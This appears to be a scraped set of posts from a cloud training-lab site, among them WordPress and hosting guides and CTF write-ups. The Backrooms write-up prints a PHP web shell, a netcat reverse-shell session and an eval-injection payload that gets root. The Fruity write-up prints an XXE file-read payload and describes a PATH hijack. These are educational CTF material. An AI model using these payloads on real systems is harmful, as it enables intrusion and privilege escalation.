python full stack developer

Python Full Stack Development Trends You Shouldn’t Miss

Artificial Intelligence (AI) has been a game-changer in every industry, and web development is no exception. If you’re taking a Python full stack developer course, you’re already on the right track to embracing the future of web applications. AI tools and frameworks in Python are opening doors to smarter, more dynamic websites that understand and adapt to user needs. Let’s explore how Python and AI are teaming up to transform web development! AI-Powered User Experience: Smarter, Friendlier Websites Have you noticed how websites seem to "know" what you want before you even ask? That’s AI at work! Python frameworks like Django and Flask integrate seamlessly with machine learning libraries such as TensorFlow and PyTorch. This allows developers to create web applications that analyze user behavior and make personalized recommendations. Imagine building an e-commerce platform that suggests products users are likely to buy based on their browsing history—it’s not just cool, it’s game-changing! If you’re learning Python, you’re already equipped to build these AI-powered features. Python’s simplicity and extensive library support make it easier to experiment with AI in your projects. Plus, frameworks like FastAPI even let you deploy machine learning models quickly, ensuring your users get a responsive and intelligent experience. Chatbots and Virtual Assistants: AI at Your Fingertips How often have you chatted with a website’s support bot that actually seemed…human? Chatbots and virtual assistants are becoming standard for customer service, and Python is leading the charge. With natural language processing (NLP) libraries like SpaCy and NLTK, you can create chatbots that understand user queries and respond intelligently. For example, Python lets you integrate AI-powered chatbots into web applications built with Django. These chatbots can handle customer questions, schedule appointments, or even guide users through a purchase. This means you can create a seamless user experience that feels professional and personalized, all while reducing the workload on your team. By incorporating chatbot features into your projects, you’ll not only improve your skills but also add a highly in-demand capability to your portfolio. Python full stack developers who can build smart chatbots are becoming hot commodities in the tech world! Predictive Analytics: The Future in Your Web App One of the most exciting trends in AI is predictive analytics, and Python makes it surprisingly accessible. Predictive analytics uses AI to analyze data and forecast trends, allowing businesses to make better decisions. Let’s say you’re building a web app for a retail store. By integrating predictive analytics, you can provide store owners with insights into future sales, inventory needs, or customer preferences. Python’s libraries like Pandas and Scikit-learn are perfect for working with data. You can create a pipeline that collects user data through your web application and analyzes it to identify patterns. Then, using Python-based visualization tools like Matplotlib, you can present these insights in an interactive dashboard within your app. These features aren’t just useful—they’re impressive! Adding predictive analytics to your projects shows potential employers or clients that you’re a forward-thinking developer who understands both the technical and business sides of web development. Why AI and Python Are Perfect Partners Python is often called the "go-to" language for AI, and for good reason. Its clean syntax, rich ecosystem of libraries, and strong community support make it the ideal choice for AI-powered web development. Whether you’re a student exploring your first Python full stack developer course or an experienced developer looking to level up, Python equips you with the tools to innovate. AI is no longer a niche field—it’s becoming an essential part of building competitive web applications. As businesses demand smarter, faster, and more user-friendly solutions, developers with AI skills are leading the charge. By mastering AI integration in Python, you’re setting yourself apart in a rapidly evolving industry. IoT Meets Web: How Python Powers the Future The Internet of Things (IoT) is revolutionizing how devices interact with each other—and with us! From smart thermostats to voice-activated assistants, IoT technology makes everyday life more convenient and connected. If you’re pursuing a Python full stack developer course, you’re stepping into an exciting world where Python bridges the gap between IoT and web development. Let’s dive into how Python powers the future of IoT-driven web applications. Bridging Devices and Dashboards with Python Imagine controlling your home lights, thermostat, and even your coffee machine—all from one web app on your phone. Sounds futuristic? With Python, it’s easier than you think. Python’s frameworks like Flask and Django allow you to create web dashboards that interact seamlessly with IoT devices. These dashboards not only display real-time data but also enable you to send commands to your devices. For example, using Python libraries like MQTT or HTTP requests, you can connect your IoT devices to a web server. Python acts as the middleman, collecting data from sensors and presenting it in an interactive interface. Whether it’s monitoring temperature or tracking energy usage, you’re essentially turning raw IoT data into actionable insights. If this doesn’t make Python the superhero of IoT, what does? Python as the Glue for IoT Protocols IoT devices often communicate using specific protocols like MQTT, CoAP, or WebSockets. Don’t worry—it’s not as complicated as it sounds! Python simplifies the process by providing libraries like Paho-MQTT and asyncio that handle these protocols with ease. This means you don’t need to be a networking expert to create a system where your devices talk to each other. For instance, let’s say you’re building a smart garden. Python can help you program sensors that measure soil moisture and then trigger irrigation based on real-time readings. By using MQTT, your web app can send alerts when the plants need water, making you a gardening genius with minimal effort. This ability to integrate seamlessly with IoT protocols is why Python is often the go-to language for IoT projects. Plus, if you’re learning Python as part of a full stack developer course, you’re gaining skills that extend far beyond just web development. Real-Time IoT Monitoring Made Easy Real-time data is at the heart of IoT. Think of smart …

Python Full Stack Development Trends You Shouldn’t Miss Read More »

Wordpress | Selfmade Ninja Lab cloud lab | training for aspiring IT students

WordPress Hosting on Selfmade Ninja Labs: Guide

Selfmade Ninja Lab provides a cutting-edge platform for aspiring IT students to gain hands-on experience in a secure and practical environment. This guide will walk you through hosting a WordPress website using Selfmade Ninja Lab’s reliable and flexible infrastructure. we will focus on how to install WordPress on Ubuntu 18.04. WordPress is a free and open-source content management platform based on PHP and MySQL. It’s the world’s leading blogging and content management system with a market share of over 60%, dwarfing its rivals such as Joomla and Drupal. WordPress was first released on May 27th, 2003 and powers over 60 million websites to date! So powerful and popular it has become that some major brands/companies have hosted their sites on the platform. These include Sony Music, Katy Perry, New York Post, and TED. It’s very easy to install WordPress on Ubuntu or any other operating system. There are so many open-source scripts to even automate this process. Many hosting companies provide a one-click install feature for WordPress to get you started in no time. Ease of Use This platform offers a simple, intuitive dashboard that requires no prior knowledge of programming languages like PHP, HTML5, or CSS3. With just a few clicks, you can build a professional site. Additionally, it provides free templates, widgets, and plugins to simplify the process of starting your blog or website. Responsive Design The platform is inherently responsive, ensuring your site fits seamlessly across multiple devices. This also boosts your site’s ranking in search engines! Quick Installation and Upgrades Installation on Ubuntu and other operating systems is straightforward, with numerous scripts available to automate the process. Many hosting providers offer a one-click setup feature, saving you time. SEO-Ready Framework Built with clean, consistent code, it ensures your site is easily indexable by search engines. Tools like the Yoast plugin can further enhance rankings. Getting Started with Selfmade Ninja Lab Selfmade Ninja Lab simplifies cloud lab training for aspiring IT students. Here’s how you can begin: Sign In or Create an Account: If you already have an account, Sign in to Selfmade Ninja Lab (Click here) New user? Create your account here. Access the Cloud Lab Dashboard: Visit Selfmade Ninja Labs. How to Create a WordPress Database in Selfmade Ninja Cloud Labs Selfmade Ninja Labs provides an easy and seamless way to set up a WordPress database. Follow these steps to create a WordPress database using their cloud platform: Navigate to the “Services” section from the left-side navbar and select “MySQL Server.” Click the “Manage” button for the MySQL server. Select “Add User” and fill in the required fields: username, password, and confirm password. Click to create the new user. Once the user is created, click “Manage Database” to create a database name. You can copy the database name & password to your clipboard for later use. Installing WordPress CMS on Selfmade Ninja Cloud Labs Setting up WordPress CMS on Selfmade Ninja Labs is simple and efficient. Here’s how to do it: Step 1: Accessing the Machine Lab Navigate to the “My Lab” section from the left-side navbar and select “Machine Lab.” Locate the “Essentials Lab” and click the “Dashboard” button (available for free users). Click the “Code” button on the top-right side to reveal the “Visual Studio Code on Web” option. Copy the code server password and launch the code IDE. A new tab will open with Visual Studio Code on the web. Open the terminal and proceed with the following steps. Step 2: Setting Up WordPress Now that your server software is configured, you can download and set up WordPress. For security reasons, it is always recommended to get the latest version of WordPress from their site. Execute the following commands in your terminal to install WordPress: Download the latest version of WordPress: cd /tmp && wget https://wordpress.org/latest.tar.gz Uncompress the tarball to generate a folder named “wordpress”: tar -xvf latest.tar.gz Copy the WordPress folder to the /var/www/html/ path: cp -R wordpress /var/www/html/ Change ownership of the WordPress directory: chown -R www-data:www-data /var/www/html/wordpress/ Update file permissions for the WordPress folder: chmod -R 755 /var/www/html/wordpress/ Create an “uploads” directory: mkdir /var/www/html/wordpress/wp-content/uploads Change permissions for the “uploads” directory: chown -R www-data:www-data /var/www/html/wordpress/wp-content/uploads/ Setting Up the WordPress Configuration File Now, you need to make some changes to the main WordPress configuration file. When you open the file, your first task will be to adjust some secret keys to provide a level of security for your installation. WordPress provides a secure generator for these values so that you do not have to try to come up with good values on your own. These are only used internally, so it won’t hurt usability to have complex, secure values here. Generate secure keys for added security: curl -s https://api.wordpress.org/secret-key/1.1/salt/ Copy the output generated. Open the WordPress configuration file: sudo nano /var/www/html/wordpress/wp-config.php Replace the default key placeholders with the secure keys you copied. Next, update the database connection settings at the start of the file. You’ll need to modify the database name, username, and password to match the configuration you set up in MySQL. Additionally, adjust the method WordPress uses to handle file operations. Since the web server has the necessary permissions to write to the required locations, set the filesystem method to “direct.” Without this configuration, WordPress may prompt you to provide FTP credentials for certain actions. You can add this setting below the database connection details or anywhere else in the file. Save and close the file when you are finished. Completing Installation Through the Web Interface Now that the server configuration is complete, you can complete the installation through the web interface. Open your web browser and navigate to your server’s domain name or public IP address: For the primary user: https://server_domain_or_IP/wordpress For free users:If you have port-forwarding set up, access your WordPress website by using port 80. Proceed with the WordPress installation steps via the web interface. You will be prompted to select the language you would like to use: Follow the WordPress installation wizard. Provide the …

WordPress Hosting on Selfmade Ninja Labs: Guide Read More »

SNA Labs CTF

Guide on How to Play CTF Challenges in Selfmade Ninja Labs

Embark on an Exciting CTF Challenge Adventure Welcome to your go-to guide for mastering Capture The Flag (CTF) challenges with Selfmade Ninja Lab cloud lab training for aspiring IT students. This guide is your roadmap to honing new skills, broadening your knowledge, and conquering exciting CTF challenges. Whether you’re just starting or an experienced enthusiast, this guide will help you excel. Let’s dive into the thrilling world of CTF challenges! Prerequisites for Selfmade Ninja Labs CTF Challenges: A Laptop or a PC with a stable internet connection. 💻 Make sure your laptop or PC is connected with Essential labs. A cozy cup of coffee for a productive session. ☕ Getting Started with Selfmade Ninja Labs 🌐 Start your journey by visiting the official Selfmade Ninja Lab homepage: https://labs.selfmade.ninja. Logging In New to the platform? No problem! Log in using your GitLab credentials directly from the dashboard. This step gives you access to an array of CTF challenges meticulously crafted as part of the Selfmade Ninja Lab cloud lab training for aspiring IT students. Login Steps: Navigate to the login page. Select Login with GitLab. This feature unlocks all the incredible training modules and challenges. Accessing the Challenge Labs Page 🧭 Begin your CTF challenge journey by visiting the Selfmade Ninja Labs homepage: https://labs.selfmade.ninja For Newcomers New to SNA Labs? You’ll need to log in. Look for the Login with GitLab option on the dashboard. This is your gateway to all the incredible features and CTF challenges that await in SNA Labs. 🔑 Navigating to the Challenge Labs Page 🧭 Once logged in, simply click on Challenge Labs in the menu. This effortless step will lead you straight to a realm filled with diverse and exciting CTF challenges. [OR] Clicking on this link will directly take you to the Challenges page: https://labs.selfmade.ninja/labs?type=challenge. The page will appear as below: Here, all the CTF challenges are neatly lined up, with all the necessary controls at your fingertips. Note: Remember, some CTF challenges are reserved for VIP account holders. However, as a free user, there are some free challenges that you can play. 🎮 Choosing and Starting a CTF Challenge 🎲 Got into the Challenge line-up page? Great! Now it’s time to pick up a CTF challenge. For example, you might choose the Send the Alien Back Home challenge (you can find it by scrolling down the page), but feel free to select any CTF challenge that excites you. Each challenge is a unique adventure that tests different skills. Get ready to embark on an exhilarating CTF challenge journey and master the challenges in SNA Labs! Let the excitement unfold! 👾 Click on the Dashboard of the CTF challenge that you desire to play. It displays the details of your challenge like the Challenges involved in it, the time you took to crack it, Achievements, and Leaderboard of that particular challenge. Here is the breakdown of what is in the above-mentioned sections. 1. CHALLENGES: This section gives you the sub-challenges that you need to crack in order to complete the whole CTF challenge. You need to crack the present challenge in order to unlock the next challenge. The mentioned amount of Zeal points will be awarded to you after cracking that respective challenge. 2. ACHIEVEMENTS: This section will give you side quests and targets. On meeting the targets and finishing the side quests, you will be awarded the mentioned Jolts and Zeal points. 3. LEADERBOARD: This section will display the leaders of the CTF challenge based on the time they took to crack it, achievements completed, and the number of hints used. Now that you’ve got an overview of how the CTF challenge works, let’s move further. After selecting your challenge, here’s how to get started: 1. Deploy the Challenge: Click the ‘Deploy’ button to set up your chosen CTF challenge. Think of it as prepping your digital battleground. 2. Start Your Mission: Go to the Challenges and click the ‘Start Mission’ button in the 1st challenge. This action kick-starts your CTF challenge, taking you into the heart of the adventure. After clicking ‘Start Mission’, click on the Mission Brief button to see what the challenge is based on. 3. Access Connection Information: Post-launch, essential connection information will be displayed. This is the lifeline for your interaction with the CTF challenge. 4. Copy Local Forward Contents: Within the connection details, locate and copy the Local Forward contents. These specifics are crucial for connecting to and progressing within the CTF challenge environment. Connecting to Your CTF Challenge! You’re almost ready to dive into the heart of the CTF challenge. Follow these steps to connect everything up and get into the thick of the action. Connecting to your mission can be done in two ways: With WebIDE that comes with our machine labs With VSCode First, let’s see how to do it with the WebIDE. 🖥 Set Up Your Machine Lab Now, it’s time to bring your own digital toolkit into play. Head to Machine Labs: Navigate to the ‘Essentials Dashboard’ in the Machine Labs section. The Machine Labs section is in the My Labs drop-down on the left end of the page. This is like going to your personal command center. Open the Code Server: After deploying, click on the ‘Code’ button. This will open a new tab where the magic happens – the code server. Think of it as opening a door to your control room. Then launch the Web IDE. Final Steps to Launch Your Mission After setting up your Lab and entering the Local Forward contents, you’re just a few clicks away from starting your CTF challenge. 🛠 Activate the Port Forwarding Copy the socat command from the connection info, paste it in the WebIDE’s terminal, and then run it. What is Socat? The socat command is a versatile utility that allows for bidirectional data transfers between two locations, and it’s often used for port forwarding, among many other functionalities. To set up port forwarding using socat, you would use a …

Guide on How to Play CTF Challenges in Selfmade Ninja Labs Read More »

The Ultimate FREE Hosting Guide

Launch Your Website Effortlessly with Selfmade Ninja Lab: The Ultimate FREE Hosting Guide

The Ultimate FREE Hosting Guide Hey there! Welcome to your step-by-step guide for launching a professional website without spending a single penny! Designed for aspiring IT students, this guide will teach you how to use Selfmade Ninja Lab cloud lab training for aspiring IT students to set up a free domain, hosting server, and much more. With this training, you’ll gain hands-on experience in website creation, hosting, and server configuration—all completely free of cost. Let’s get started! Why Choose Selfmade Ninja Lab for Free Hosting? Selfmade Ninja Lab offers aspiring IT students an exceptional opportunity to learn website hosting and cloud server configuration in a practical environment. With Selfmade Ninja Lab cloud lab training for aspiring IT students, you’ll gain real-world skills to boost your technical expertise. Here are the key benefits of choosing Selfmade Ninja Lab: Free Hosting and Domain: Set up your website without spending a dime. Hands-On Training: Practical experience in hosting and server management. Beginner-Friendly: Designed for both students and beginners eager to learn. Prerequisites To follow this guide, you’ll need: Selfmade Ninja Labs Account: If you don’t have one, create it by clicking here. Selfmade Ninja VPN Connection: Configure the VPN on your PC. For instructions tailored to your operating system, refer to these guides: Windows Users Linux Users Mac Users Awesome! Now that you’ve got your essentials ready, let’s dive into creating your website. We’ll make it easy, fun, and completely free. Your dream website is just a few steps away! 🌟🖥✨ Accessing Selfmade Ninja Lab Open Your Browser: Grab your laptop and open your favorite web browser. Visit Selfmade NinjaLabs: Type labs.selfmade.ninja into the address bar. You’ll see a login page. Login: Click the ‘Login with GitLab’ button. If you don’t have a GitLab account, you can log in using your Google account or create a new account by clicking ‘Register now’. The best part? This whole process is free. No credit card information required! Let’s set you up and dive into the exciting world of website hosting. Setting Up Your Free Domain Once you’ve logged in, you’ll see the dashboard, which looks like this: If you see a message saying, "You are on a Free plan. Your access is limited," don’t worry. Even with a free plan, you can still secure a domain and host your website at no cost. 🌐💻✨ Exploring Dashboard Options Before redeeming your free domain, let’s explore the three key options available on your dashboard: Machine Lab: Think of this as your personal cloud computer, available 24/7. It’s powerful enough for both development and hacking. Even if your laptop is low-end, we’ve got you covered. I’ll cover this in more detail in an upcoming blog post. Spot Quiz: This feature helps you test your aptitude with gamified quizzes. Correct answers earn you ‘Zolts,’ a platform currency that can unlock extra features, like additional domains. I’ll explain how to redeem these Zolts in a future blog post. Challenge Lab: This is where you can learn hacking in a fun, game-like environment. It’s an engaging way to improve your hacking skills. Note: Stay tuned for detailed explanations of these features in upcoming blog posts! 🌟💡👩‍💻👨‍💻 Adding Your Domain Let’s get started with building your website. Go to the ‘Connectivity’ navbar and find the ‘My Domain’ section. Click on ‘My Domain’ to be redirected to a new page: Here, you have two options: Add New Domain and How to Use Domain. Click ‘Add New Domain,’ and a dialog box will appear prompting you to enter your domain name. For example, I chose helloworld, resulting in helloworld.selfmade.fun. You can select from a list of subdomains or use your own. After entering your domain name, click ‘Verify and Add’ to check its availability. If the domain is free, you can use it immediately. Congratulations on adding your domain! 🎉💻🌐👍 Setting Up Your Hosting Server With your domain ready, let’s move on to setting up your hosting server. Navigate to the ‘My Labs’ section and select ‘Machine Labs’. You’ll be taken to a page similar to this: In the dashboard, the free version offers access to one lab, which is an Ubuntu machine. Premium versions include more options, like Docker, which I’ll cover in future blog posts. Deploying Your Server Access the Dashboard: Click the ‘Dashboard’ button, then press ‘Deploy’. A dialog box will appear. Select ‘Expose to Web to Public’ and set the exposure to ’80 over 443′. This step is crucial for making your server accessible online. Don’t forget to select your domain from the options. Click ‘Confirm Deploy’ when you’re ready. This process might take a minute. Use this time to relax and anticipate the launch of your website! 🌐🖥✨🥤 Dashboard Overview: Once deployment is complete, you’ll see a dashboard with various options: Code Button: Interact with your server directly through your browser. Redeploy Button: Restart your machine for a fresh start. Stop Button: Stop the machine as needed. Lab Information: Find your username, password, and links to your VS Code server. Configuring Your Server Open VS Code: Click on the ‘Code’ button. A dialog box will appear with a password. Copy this password and paste it into the new page that opens. Click ‘Submit’. You now have VS Code running in your browser. Click on the file icon, then ‘Open Folder’, and navigate to the folder shown below. Create Document Root: Inside your home folder on VS Code, open the htdocs folder. Create a new folder for your document root and an index.php file. Paste your HTML page into this file. Set Up Apache Configuration: In the home folder, there’s a folder named ‘htconfig’. Create a new config file inside this folder. Copy and modify the following configuration: ServerName ServerAdmin webmaster@localhost DocumentRoot Options -Indexes -FollowSymLinks AllowOverride None Require all granted ErrorLog ${APACHE_LOG_DIR}/error.log CustomLog ${APACHE_LOG_DIR}/access.log combined 4.Update init.sh: Add the following commands to the init.sh file in your home folder: sudo a2ensite <your_config_name> sudo service apache2 restart init.sh automates initialization and configuration during redeployment. It preserves the state and configurations …

Launch Your Website Effortlessly with Selfmade Ninja Lab: The Ultimate FREE Hosting Guide Read More »

Backrooms-Yukthi CTF Prelims 2024: The Backrooms Challenge Uncovered

Introduction The Backrooms challenge in the Selfmade Ninja Labs cloud lab training for aspiring students during the Dsocity-Yukthi CTF Prelims 2024 offers an immersive exploration of cybersecurity. Participants tackle critical concepts such as web security, scripting vulnerabilities, and privilege escalation. Through tasks ranging from PHP payload manipulation to Python script analysis, the challenge refines tactical thinking and technical expertise for real-world scenarios. Getting Started with the Backrooms Challenge To participate in the Backrooms challenge, follow these steps: Create an Account Visit Selfmade Ninja Labs and sign in (click here). If you don’t already have an account, create one by (click here) Activate WireGround Once signed in, activate WireGround to set up your lab environment. Open the Challenge Dashboard Go to Selfmade Ninja Labs, and click Machine Labs on the dashboard. Navigate to the left-side navbar, click the dropdown under My Lab, and select Challenge Lab. Locate the Backrooms Challenge Browse the list of challenges on the page. Search for Backrooms and click the corresponding challenge button. Start the Mission Click the Replay the Lab button at the top right of the page. Click Start Mission to begin. Note your IP address for this lab environment. Use VS Code to set up port forwarding before starting the challenge. Key Takeaways from the Backrooms Challenge File Upload Security PHP Payload Crafting Python Script Vulnerability Analysis Markdown Exploitation Root Privilege Escalation Cybersecurity Strategy Enumuration Nmap To further our investigation, we employed Nmap, a powerful network scanning tool, to discover any additional services that might be running on the target machine. After deploying the challenge environment, the IP address was provided, but specific service ports were not immediately apparent. To uncover all open ports on the server, we executed the following Nmap command: nmap -p- ip_address prasaanth2k@essentials:~$ nmap -p- 10.11.2.17 Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-13 08:10 UTC Nmap scan report for e27ebd31ed77421435ee36c5d6235a84.labs_frontend (10.11.2.17) Host is up (0.00010s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 80/tcp open http 86/tcp open mfcobol Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds Upon reviewing the Nmap scan results, it became evident that port 80 was open, while port 86 was running. Such findings often indicate non-standard configurations or intentionally obscured services, possibly as part of the challenge setup. For the initial mission, participants encounter a PHP endpoint embedded within the page, offering the functionality of file upload. While this feature allows users to upload files, attempts with the .php extension are thwarted. However, a clever workaround emerges: utilizing the .php2 extension bypasses this restriction, enabling successful uploads. Thus, armed with this insight, we seamlessly injected the meticulously crafted payload below. <?php system($_GET['cmd']); ?> With this exploit payload successfully uploaded, we gain the ability to execute commands. Leveraging this newfound capability, we initiate the process to establish a reverse shell. By executing specific commands within the uploaded payload, we orchestrate the reverse shell mechanism, effectively enabling us to establish a connection back to our system. This reverse shell serves as a conduit, granting us remote access and control over the compromised system, thereby facilitating further exploration and exploitation of its resources. prasaanth2k@essentials:~$ nc -lvnp 4326 Listening on 0.0.0.0 4326 Connection received on 10.13.1.243 54618 Linux entiti.selfmade.ninja 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux 08:50:24 up 3 days, 5:36, 0 users, load average: 0.68, 0.96, 1.31 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=1000(backrooms) gid=1000(backrooms) groups=1000(backrooms),27(sudo) TERM environment variable not set. backrooms@entiti:/$ export TERM=xterm export TERM=xterm backrooms@entiti:/$ export SHELL=bash export SHELL=bash backrooms@entiti:/$ backrooms@entiti:/$ cd ~ cd ~ backrooms@entiti:/home/backrooms$ ls ls backrooms_escape_map.txt backrooms@entiti:/home/backrooms$ cat b cat backrooms_escape_map.txt c3d66019b22a7ee81f2afbe6836e60ae.ninja backrooms@entiti:/home/backrooms$ Foothold and Privilege Escalation Upon obtaining the reverse shell, our enumeration efforts continue, leading us to inspect the sudoers file using the sudo -l command. Within this file, located at /var/www/html, we uncover a Python script. This script is configured to run with elevated privileges, as indicated by its presence in the sudoers file. Examining the contents of this Python script reveals its functionality and potential vulnerabilities, providing us with valuable insights into its operations and the avenues for exploitation it may present. backrooms@entiti:/home/backrooms$ sudo -l sudo -l Matching Defaults entries for backrooms on entiti: env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin User backrooms may run the following commands on entiti: (ALL : ALL) ALL (ALL) NOPASSWD: /usr/bin/python3 /usr/local/bin/escape_ticket.py def load_file(loc): if loc.endswith(".md"): return open(loc, &#039;r&#039;) else: print("Wrong file type.") exit() def evaluate(ticketFile): code_line = None for i,x in enumerate(ticketFile.readlines()): if i == 0: if not x.startswith("# backrooms"): return False continue if i == 1: if not x.startswith("## Ticket to me"): return False print(f"Destination: {&#039; &#039;.join(x.strip().split(&#039; &#039;)[3:])}") continue if x.startswith("__Ticket Code:__"): code_line = i+1 continue if code_line and i == code_line: if not x.startswith("**"): return False ticketCode = x.replace("**", "").split("+")[0] if int(ticketCode) % 7 == 4: validationNumber = eval(x.replace("**", "")) if validationNumber > 100: return True else: return False return False def main(): fileName = input("Give me the serect key path.n") ticket = load_file(fileName) result = evaluate(ticket) if (result): print("Valid ticket.") else: print("Invalid ticket.") ticket.close main() this python script prompts for the file path of a Markdown (.md) file. Our objective is to fulfill all the conditions outlined within the script. Once these conditions are met, the script will execute and spawn a shell, granting us escalated privileges. To achieve this, we meticulously analyze the script’s requirements and constraints, ensuring that our input satisfies each criterion. Upon successful fulfillment of these conditions, the script’s logic will be triggered, allowing us to exploit any potential vulnerabilities and gain access to the system via the spawned shell Here is the exploit mardown file now we can store this file and give this path to the script # backrooms ## Ticket to me: John Doe __Ticket Code:__ **4+__import__(&#039;os&#039;).system(&#039;/bin/bash&#039;)** $ whoami whoami backrooms $ sudo /usr/bin/python3 /usr/local/bin/escape_ticket.py sudo /usr/bin/python3 /usr/local/bin/escape_ticket.py Give me the serect key path. /var/www/html/exploit.md /var/www/html/exploit.md Destination: me # whoami whoami root # ls ls exploit.md helpthem.php sample.html style.css exploit.php2 index.html script.js upload.php # cd /root cd /root # …

Backrooms-Yukthi CTF Prelims 2024: The Backrooms Challenge Uncovered Read More »

Fruity Challenge Yukthi CTF

Fruity – Yukthi CTF Prelims 2024

Introduction In the fast-evolving world of cybersecurity, mastering vulnerabilities such as XXE (XML External Entity) and SUID (Set User ID) binary exploitation is crucial for IT professionals. This article explores the Fruity Challenge from the Yukthi CTF Prelims 2024, an excellent opportunity for aspiring IT students to enhance their skills. Participants can learn valuable exploitation techniques and security practices through Selfmade Ninja Lab cloud lab training for aspiring students, which offers hands-on experiences in tackling real-world cybersecurity scenarios. Getting Started with Selfmade Ninja Labs Visit Selfmade Ninja Labs and create an account (Click here) If you don’t have an account, register via Selfmade Ninja Git (Click here) Activate WireGuard on your system. Go back to Selfmade Ninja Labs and navigate to the Machine Labs section on the dashboard. On the left-side navbar, click My Lab > Challenge Lab to access the challenge page. Browse the available challenges and search for “Fruity.” Click the Challenge button to open the Fruity Challenge page. In the top-right corner, click Deploy Lab, then select Start Mission. Copy the provided IP address and use VS Code’s remote SSH extension to forward the port, enabling you to start the challenge. Key Learnings from Selfmade Ninja Lab Cloud Lab Training Through Selfmade Ninja Lab cloud lab training for aspiring students, you’ll master: XXE Exploitation: Learn to manipulate XML entities to access sensitive files. Privilege Escalation: Exploit SUID binaries to gain higher-level privileges. Reconnaissance Tactics: Discover how to gather vital information using tools like Nmap. Exploitation Strategies: Enhance your approach to uncovering vulnerabilities. Environment Variable Manipulation: Understand the significance of altering PATH variables. Penetration Testing Techniques: Develop comprehensive testing skills. Cyber Threat Awareness: Stay ahead by understanding the latest cybersecurity trends. Enumeration Practices: Identify critical information within compromised systems. 1.Initial Reconnaissance with Nmap: Nmap reveals three open ports on the server, laying the groundwork for further investigation.with the nmap -p- command XXE Exploitation The /order endpoint accepts user input, encoding it into base64 encoded XML format before sending it to the /tracker endpoint. Crafting a malicious XML entity allows control over reflected data, leading to sensitive file access. Step 1: Craft a malicious XML payload: <?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM "file:///etc/passwd" >]> <userdata> <name>&xxe;</name> <mail>test</mail> <subject>test</subject> <comments>test</comments> </userdata> Identify sensitive file (/etc/passwd) revealing a user named "fruit". SSH Key Extraction: Knowing SSH private keys are often stored at /home/$USER/.ssh/id_rsa, target the SSH private key located at /home/fruit/.ssh/id_rsa. Exploit SSH key possession to gain remote server access. Privilege Escalation SUID Binary Exploitation: The log_reader binary, with suid permission, executes as root. Upon execution, it displays Apache log files, hinting at its functionality. Reveal potential command execution by running strings against the binary. Manipulate the PATH variable to control the tail command execution. Create a shell script named tail containing /bin/bash. Trigger the custom tail script to gain an interactive shell with root privileges. There is one binary file called log_reader unser fruit directory. It is a suid binary which is owned by root, which means it can execute functions as root user. Directly running the binary shows us some apache logs file. And running strings against the binary give us an hint about what command it might be running on execution. If the tail is invoked with it’s absolute path (ie: /usr/bin/tail) it would’ve been not exploitable. But because it is suid bit, we can control the PATH variable and the process will have no other choice then using our PATH. We can create a shell script with /bin/bash as its content and name it tail. Placing it under fruit’s home directory and prepending the home dir path to the PATH environmental variable will fool the binary into looking for tail binary in our Home directory first. Conclusion: Mastering Cybersecurity Exploitation The skills learned in challenges like the Fruity CTF Prelims 2024 are invaluable for anyone pursuing a career in cybersecurity. By mastering XXE exploitation and SUID binary privilege escalation, aspiring IT students can better understand the importance of reconnaissance, vulnerability identification, and effective exploitation strategies. With SNA Lab cloud lab training, students can gain hands-on experience in these areas, providing them with the tools needed to protect systems and stay ahead in the dynamic cybersecurity landscape.

Mystic Quest Yukthi CTF

Mystic Quest – Yukthi CTF 2024 Finals: A Journey Through Cybersecurity Challenges

Introduction The “Mystic Quest” challenge at the Yukthi CTF 2024 Finals is an exciting two-part cybersecurity adventure designed to test participants’ skills. This journey covers router firmware analysis, SSH access, and system exploitation techniques to achieve privileged access. It’s a true test of ingenuity, technical expertise, and perseverance. Getting Started To begin your journey, follow these steps: Sign in or Create an Account: Go to Selfmade Ninja Labs to sign in (click here) If you don’t have an account, visit Git Selfmade Ninja to create one (click here) Activate WireGuard: Ensure you have WireGuard activated for secure connectivity. Open the Challenge Dashboard: Log in at Selfmade Ninja Labs (click here) Navigate to Machine Labs on the dashboard. Locate the Challenge: On the left navbar, open the My Lab dropdown and select Challenge Lab. Browse the challenges and search for Mystic Quest. lick the Challenge button to proceed. Start the Mission: In the top-right corner, click Replay the Lab, then select Start Mission. You will receive an IP address. Use VSCode to port-forward this IP and start the challenge. What You Will Learn Router Firmware Analysis: Uncover hidden credentials within router firmware. SSH Access: Use discovered credentials for SSH access to a secured system. Fail2ban Exploitation: Gain insights into using fail2ban to escalate privileges and obtain root access. Challenge 1: Magical Door Story Meena, a determined cybercrime investigator, embark on a rescue mission behind a magical door to save a friend. The door, which demands specific words at the right frequency, reveals the first challenge: decrypting an encrypted log file to proceed. Challenge Flow Network Service Discovery: Upon finding a service running on port 12345, I connected using nc {ip} 12345 and was greeted with questions related to the router’s firmware. Firmware Extraction and Analysis: We need to provide an answer for this question. Yes, we received one tar file, and after attempting to extract it, we found two files: firmware.jff2 and log.txt.enc. To find the answers needed by the network service, I extracted the router’s firmware with the command: binwalk -e firmware.jff2 This allowed me to dive deep into the firmware’s contents, searching for clues. Answering Questions and Key Acquisition: Armed with insights from the firmware analysis, I confidently answered the network service’s questions. Each correct response brought me closer to the decryption key I needed. Questions ranged from firmware versions to specific configuration settings, all found within the extracted firmware files. Answering Questions: The first question is about the router firmware version, which I find as 2.0.37.131047 in /etc/version. cd jff2-root/etc cat version The remaining questions and their answers are as follows: DHCP Offer Time: 2024-02-27 19:58:28, DHCP_OFFER, MAC:ba:f4:4b:24:0e:c7, Offered IP: 192.168.1.115 Found in: /var/log/dhcp.log Lighttpd Port Number: 8090 Found in: /etc/init.d/service_httpd/lighttpd.conf Router Hostname: device21 Found in: /etc/hostname Dashboard Access User: casco Found in: /etc/dashboard/users.conf Primary Wireless Network PSK: uyGGHHH87H28UH7655 Found in: /etc/wpa_supplicant.conf Default DHCP Lease Time: 600 Found in: /etc/dhcp/dhcpd.conf SSH Service Port: 2222 Found in: /etc/ssh/sshd_config Router’s LAN Interface IP: 192.168.0.1 Found in: /etc/network/interfaces First Outbound Firewall Rule Destination Port: 84 Found in: /etc/firewall.rules Log File Decryption: With all questions answered correctly, I receive the decryption key and use it to decrypt the log file: 